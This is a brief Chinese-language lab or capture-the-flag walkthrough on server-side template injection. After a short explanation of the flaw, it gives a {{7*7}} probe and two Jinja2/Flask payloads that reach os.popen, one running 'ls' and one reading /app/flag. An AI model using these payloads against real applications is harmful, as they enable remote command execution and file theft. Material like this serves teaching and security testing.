實驗名稱
簡單的ssti
實驗簡介
是一種針對伺服器端模板的注入漏洞。
實驗說明
攻擊者 將惡意程式碼輸入到模板 伺服器在執行時未對惡意程式碼進行處理 就輸出執行
將字串 當作模板執行
ssti注入就是使其渲染我們想要執行的的字串
實驗步驟
步驟一:
輸入 {{7*7}}判斷型別
步驟二:
{{url_for.__globals__.__builtins__['__import__']('os').popen('ls').read()}}
步驟三:
{{' '.__class__.__base__.__subclasses__()[133].__init__.__globals__['popen']('cat /app/flag').read()}}
